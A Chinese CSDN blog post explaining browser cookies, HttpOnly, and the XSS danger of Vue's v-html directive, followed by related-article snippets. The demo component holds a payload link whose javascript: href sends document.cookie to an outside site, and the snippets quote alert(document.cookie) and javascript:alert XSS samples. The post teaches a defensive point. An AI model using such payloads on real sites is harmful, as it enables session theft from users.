什么是cookie,以及v-htm的安全性隐患

最新推荐文章于 2024-02-18 23:25:32 发布
最新推荐文章于 2024-02-18 23:25:32 发布
阅读量158 收藏
点赞数
分类专栏: vue 文章标签: HTTP Cookie JavaScript 安全 v-html Vue.js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46302247/article/details/125482142
版权

什么是cookie?服务器返回的key-value形式的字符串,然后被浏览器保存下来了在这里插入图片描述
在这里插入图片描述
只有HttpOnly未打钩的,才能被js获取;HttpOnly是后端设置的
在这里插入图片描述
v-htm的安全性隐患

<template>
  <div class="profile">
    <div v-html="str"></div>
  </div>
</template>

<script>
export default {
  data() {
    return {
      str: '<a href=javascript:location.href="http://www.baidu.com?"+document.cookie>点我有惊喜!</a>'
    }
  },
}
</script>

在这里插入图片描述

qq_46302247
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透--49--常见的数据信息泄露
武天旭的博客
09-22 5354
一、备份文件泄漏 1.1、漏洞描述: 备份文件泄露,在web服务中,常常不局限于网站的源代码泄露,网站的数据库备份文件,以及上传的敏感文件,或者一切正常备份,原则不允许访问的文件可被通过访问web路径进行下载得到,造成其信息泄露。有效的帮助攻击者理解网站应用逻辑,为展开其他类型的攻击提供有利信息,降低攻击的难度,可以进一步获取其他敏感数据。
DoraBox-master综合性靶机练习
滕财然的博客
05-18 1779
文章目录1、SQL注入sql数字型:sql字符型:sql搜索型:2、XSS跨站脚本攻击XSS反射型:XSS存储型:XSS DOM型:3、CSRFJSONP劫持:CORS跨域资源读取:4、文件包含任意文件包含:目录限制文件包含:5、文件上传任意文件上传:JS限制文件上传MIME限制文件上传扩展名限制文件上传内容限制文件上传6、命令执行任意代码执行:任意命令执行:7、SSRF8、其它条件竞争-支付条件竞争-上传任意文件读取XXE 1、SQL注入 攻击者可以提交一段精心构造的数据库查询代码,根据返回的结果,获得
Vue2中v-html引发的安全问题
知远同学的博客
12-06 1280
1.作用:向指定节点中渲染包含html结构的内容。2.与插值语法的区别:(1).v-html会替换掉节点中所有的内容,{{xx}}则不会。(2).v-html可以识别html结构。3.严重注意:v-html安全性问题!!!!(1).在网站上动态渲染任意HTML是非常危险的,容易导致XSS攻击。(2).一定要在可信的内容上使用v-html,永不要用在用户提交的内容上!
vue代码安全,10项防范措施
最新发布
大剑师兰特的GIS世界
02-18 988
软件程序的代码安全非常重要,一个脆弱的代码,很容易被黑客攻克,引起不必要的麻烦。vue代码如何做好代码防护呢? 以下这10条方案,能很好的解决掉一些脆弱的地方。
Vue基本指令
weixin_45067120的博客
05-02 149
模板语法1 插值2. 过滤器3. 计算属性4. 监听属性 ##demo1.hrml 1 插值 1.1 文本 {{msg}} 1.1.1 html 使用v-html指令用于输出html代码 v-text 1.1.2 属性 HTML属性中的值应使用v-bind指令 1.1.3 表达式 Vue提供了完全的JavaScript表达式支持 {{str.substr(0,6).toUpperCase()}} ...
v-html指令
qq_46582421的博客
11-17 1046
1.作用:向指定奶点中渲染包含htm1结构的内容。 2.与插值语法的区别; (1).v-html会替换掉节点中所有的内容,{{xx}}则不会。 (2).v-html可以识别html结构。 3.严重注意: v-html安全性问题! ! ! ! (1).在网站上动态渲染任意HTML是非常危险的,容易导致XSS攻击。 (2).定要在可信的内容上使用v-html,永不要用在用户提交的内容 上! <!DOCTYPE html> <html lang="en"> <head>
v-cloak,v-text,v-html的基本用法
hdy119yaner的博客
03-22 1258
属性介绍 v-cloak : 用于将延迟而出现的数据渲染问题进行附加优化(延迟加载闪烁问题) v-text : 用于将延迟而出现的数据渲染问题进行属性化优化(简单字符串的展示) v-html : 用于将数据域的HTML语句无法解析问题进行处理(识别html标签渲染) 使用详情 1.v-cloak 下面这行代码块中的msg数据可能会因为网络或者设备问题出现延迟加载,相应缓慢的问题,如图所示:...
EffeTechHTTPSniffer-v4.1.rar http 监视
10-14
《EffeTech ...通过理解和掌握这个工具,我们可以更好地理解网络通信过程,提升网络应用的安全性和效率。在日常工作中,合理利用EffeTech HTTP Sniffer,无疑会提高我们的工作效率,并且增强网络防护意识。
jsessionid和jwt_怎样实现登录?| Cookie or JWT
weixin_39651735的博客
12-21 165
先问小伙伴们一个问题,登录难吗?“登录有什么难得?输入用户名和密码,后台检索出来,校验一下不就行了。”凡是这样回答的小伙伴,你明显就是产品思维,登录看似简单,用户名和密码,后台校验一下,完事了。但是,登录这个过程涵盖的知识点是非常多的,绝不是检索数据,校验一下这么简单的事。那么登录都要哪些实现方式呢?i最传统的就要是Cookie-Session这种方式了,最早的登录方式都是这样实现的。但是随着手机...
网络安全面试题
fzx_hsaj的博客
02-12 6万+
在当今社会网络安全行业越来越发达,也有越来越多的人去学习,为了更好地进行工作,除了学好知识外还要应对企业的面试。 所以在这里我归总了一些网络安全方面的常见面试题,希望对大家有所帮助。 windows常见 1:描述tcp/udp的区别及优劣,及其发展前景 TCP—传输控制协议,提供的是面向连接、可靠的字节流服务。当客户和服务器彼此交换数据前,必须先在双方之间建立一个TCP连接,之后才能...
Vue文本渲染三种方法 {{}}、v-html、v-text
qq_25503949的博客
07-10 1925
有一个input输入框,需要用户输入名字,用户却输入一个恶意脚本,<script>alert(document.cookie)</script>, 或者用户输入一个HTML,在标签中嵌入恶意脚本,如src,href,css style等。如:<IMG SRC="javascript:alert('XSS');">;
v-html 和{{}}区别
灰太狼-铜豌豆的博客
08-15 7666
在网页中,后台传来的json数据中包含html标签,将该json数据绑定到Vue.js中对象中,对该对象进行for循环,发现数据中的html标签不能被解析,而是当作字符显示出来。 Vue.js中提供了v-html这个指令来解决这个问题。
vue中v-text,v-html, v-model, {{}}之间的异同
热门推荐
yummyH
10-09 6万+
首先我们知道vue中有很多自定义指令,以v- 开头,例如:v-text,v-bind,v-model, v-if,等 在这些指令中,部分指令之间是很容易被混淆,所以今天决定自己总结一下以下几个相似指令之间的异同: 1.v-text v-text是用于操作纯文本,它会替代显示对应的数据对象上的值。当绑定的数据对象上的值发生改变,插值处的内容也会随之更新。注意:此处为单向绑定,数据对象上的值改变
Vue中v-html的用法
chen_ac的博客
06-14 1万+
在Vue语法中,通过{{}}可以输出文本变量,当时它并不能实现在一个标签语句加入一个新的标签语句,这时候需要用到v-html属性来完成操作 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> <script src="https://cdn.jsdelivr.net/npm/vue@2.6.14/dist
Vue中的{{}}与v-html
HansExploration的博客
05-28 9042
最近遇到这样一个问题,在页面上要显示一段自定义的文本,文本如果较长的话需要换行显示。在HTML中可以通过&lt;br/&gt;标签换行,也可以通过\n转义字符换行在Vue中用大括号显示的变量,加&lt;br/&gt;会直接被当成字符串显示出来,加\n显示一个空格,加\r\n显示两个空格,因为{{}}是文本插值,内部都会按照普通字符串进行处理,可以用v-html进行显示如下显示name变量[java...
Vue基础-文本显示,v-html插入html代码
weixin_30776863的博客
07-28 7369
1. 显示内容 {{}} <div id="app"> <p>{{ message }}</p></div> <script>new Vue({ el: '#app', //el是选择元素的挂载节点,这里#是加父节点id data: { //赋值 message: 'Hello Vue....
使用v-html解决Vue.js渲染过程中html标签不能被解析(html标签显示为字符串)
杨春建的博客
06-22 4万+
原文地址:http://blog.csdn.net/faryang/article/details/53011703 在网页中,后台传来的json数据中包含html标签,将该json数据绑定到Vue.js中对象中,对该对象进行for循环,发现数据中的html标签不能被解析,而是当作字符显示出来。问题如下所示: 解决: Vue.js中提供了v-html
vue中的v-html指令
weixin_42287935的博客
12-04 1264
v-html指令会将 span 的内容替换成 rawHtml 的属性值,直接作为 HTML 代码解析。但是会忽略解析属性值中的数据绑定,意味着会作为纯粹的 HTML 代码,而不是 Vue template 模板进行解析,如下: <div id="app"> <span>{{msg}}</span> <p>Using mustaches:{{ ...
vue 动态渲染 html标签解决方案 v-html
xuelang532777032的博客
10-07 1万+
是这样,我碰到的问题 是  数据库循环出来的字段是一个html字符串   是要拼到页面上的  这时候   很简单  其实    v-html 举个栗子   直接是就   v-html就可以了,这是VUE2.0之后  的写法 ,还不懂就到我的QQ群来,我来给你说吧 好, 我的 群153181864  前端交流群 ,绝对原创,转载请附上 本微博链接。
Cookie安全困局:隐患与解决方案
但是,Cookie也存在一些安全隐患,在当前网络环境下,Cookie安全困局成为一个非常重要的研究课题。 **Cookie的基础知识** Cookie是由服务器或脚本写入的,存储于浏览器或传输于HTTP头部。Cookie的基本结构由三元组...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值